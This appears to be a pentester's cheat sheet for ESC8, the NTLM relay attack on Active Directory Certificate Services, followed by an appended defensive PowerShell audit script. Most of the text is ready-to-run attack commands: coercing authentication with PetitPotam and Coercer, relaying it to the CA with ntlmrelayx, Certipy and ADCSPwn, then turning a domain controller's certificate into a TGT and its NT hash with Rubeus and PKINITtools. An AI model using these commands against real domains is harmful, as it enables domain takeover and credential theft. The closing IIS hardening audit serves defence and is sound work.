ESC8
NTLM Relay to AD CS HTTP Endpoints

Enumerate

Discover CES endpoints with certutil:
Cmd > certutil.exe -enrollmentServerURL -config CA01.megacorp.local\CA01
Discover CES endpoints with PowerShell:
PS > Get-CertificationAuthority | select name,enroll* | fl

Exploit

ntlmrelayx

$ sudo ntlmrelayx.py -t http://CA01.megacorp.local/certsrv/certfnsh.asp -smb2support --no-wcf-server --adcs [--template VulnTemplate]
$ python3 Petitpotam.py -d '' -u '' -p '' 10.10.13.37 192.168.1.11
PS > .\Rubeus.exe asktgt /user:DC1$ /domain:megacorp.local /dc:DC1.megacorp.local /certificate:<BASE64_PFX_CERT> /ptt

PKINITtools

Back up the original httpattack.py and replace it with the one from the toolkit, edited with the target domain name and, if needed, a different template (DomainController is the default, but KerberosAuthentication also works):
$ sudo cp /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py.bak
$ subl ntlmrelayx/httpattack.py
$ sudo cp ntlmrelayx/httpattack.py /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py
Perform the relay attack, request a TGT via PKINIT with the obtained certificate and recover the NT hash through the Kerberos U2U extension:
$ sudo ntlmrelayx.py -t http://CA01.megacorp.local/certsrv/certfnsh.asp -smb2support --no-wcf-server
$ python3 Petitpotam.py -d '' -u '' -p '' 10.10.13.37 192.168.1.11
$ python3 gettgtpkinit.py megacorp.local/'DC1$' -cert-pem cert.pem -key-pem privatekey.pem dc1.ccache
$ KRB5CCNAME=dc1.ccache python3 getnthash.py megacorp.local/'DC1$' -key 00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff
Revert the original httpattack.py:
$ sudo mv /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py.bak /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py

Certipy

Prepare for the relay attack:
$ certipy relay -ca 192.168.1.11 -template DomainController

ADCSPwn

Start a relay server:
PS > .\ADCSPwn.exe --adcs CA01.megacorp.local
Coerce the authentication, e.g. via Coercer:
$ coercer -u snovvcrash -p 'Passw0rd!' -wh VICTIM01 -wp 8080 -t 192.168.1.11
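Defender's counterpart, added here and not part of the original cheat sheet: a PowerShell audit of the CertSrv web enrollment application on the CA host for the three settings that break this relay (HTTPS required, Extended Protection for Authentication set to Require, Negotiate preferred over NTLM), i.e. the hardening Microsoft describes in KB5005413. The site name "Default Web Site" and the application path "CertSrv" are assumptions; adjust them to the CA's IIS layout.

```powershell
# Added example: audit ESC8-relevant IIS settings on the AD CS web enrollment app.
# Run elevated on the CA host (e.g. CA01). Requires the WebAdministration module.
Import-Module WebAdministration

# Assumption: default site and application path for web enrollment.
$app = 'IIS:\Sites\Default Web Site\CertSrv'
$findings = @()

# 1. Require HTTPS: ntlmrelayx relays to plain http://.../certsrv, which only works
#    when the application still accepts unencrypted connections.
$sslFlags = (Get-WebConfigurationProperty -PSPath $app `
    -Filter 'system.webServer/security/access' -Name sslFlags).Value
if (($sslFlags -split ',\s*') -notcontains 'Ssl') {
    $findings += "sslFlags='$sslFlags': HTTPS is not required on $app"
}

# 2. Extended Protection for Authentication: with tokenChecking=Require the NTLM
#    exchange is bound to the TLS channel, so a relayed handshake is rejected.
$epa = Get-WebConfigurationProperty -PSPath $app `
    -Filter 'system.webServer/security/authentication/windowsAuthentication/extendedProtection' `
    -Name tokenChecking
if ("$epa" -ne 'Require') {
    $findings += "extendedProtection tokenChecking='$epa' (expected: Require)"
}

# 3. Provider order: Negotiate first (Kerberos); NTLM should ideally be removed
#    entirely on AD CS servers once clients are confirmed to use Kerberos.
$providers = (Get-WebConfigurationProperty -PSPath $app `
    -Filter 'system.webServer/security/authentication/windowsAuthentication/providers' `
    -Name Collection) | ForEach-Object { $_.value }
if ($providers[0] -ne 'Negotiate') {
    $findings += "windowsAuthentication providers: $($providers -join ', ') (Negotiate should be first)"
}
if ($providers -contains 'NTLM') {
    $findings += "NTLM provider still enabled on $app (disable once Kerberos-only is confirmed)"
}

if ($findings.Count -eq 0) { 'CertSrv passes the ESC8 hardening checks' } else { $findings }
```

The same checks apply to the CES application (the URLs returned by `certutil -enrollmentServerURL` above) when the Certificate Enrollment Web Service role is installed.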